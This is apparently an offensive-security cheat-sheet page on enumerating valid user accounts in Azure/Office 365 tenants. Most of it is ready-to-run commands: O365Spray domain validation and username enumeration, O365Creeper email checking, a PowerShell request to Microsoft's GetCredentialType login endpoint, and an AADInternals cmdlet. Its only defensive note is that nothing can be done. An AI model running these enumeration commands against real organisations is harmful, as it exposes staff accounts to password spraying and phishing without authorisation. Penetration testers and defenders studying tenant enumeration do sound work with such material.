User Spraying
Table of contents
Vulnerability
Knowing the domain name associated to an Azure tenant, you can perform a spraying attack to identify existing users.
Prerequisites
- Internet connection.
Exploit
Use O365Spray.
# First, validate the domain exists.
o365spray --validate --domain $DomainName
# Then, perform user spraying.
o365spray --enum -U Usernames.txt --domain $DomainName
Using O365Creeper, you can spray emails without specifying a domain. It will output emails that belong to an Azure tenant.
# Yeah, it only works with Python 2...
python2.7 o365creeper.py -f Emails.txt -o ValidEmails.txt
You can also validate if a user exists like so.
# Returns 0 or 6 if the username exists.
Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/GetCredentialType" -ContentType "application/json" -Method POST -Body (@{"username"="$Email"; "isOtherIdpSupported" = $true}|ConvertTo-Json) | Select -ExpandProperty IfExistsResult
# With AADInternals.
Get-AADIntLoginInformation -UserName $Email
Recommendations
- Nothing to do here, this exploit is possible by design.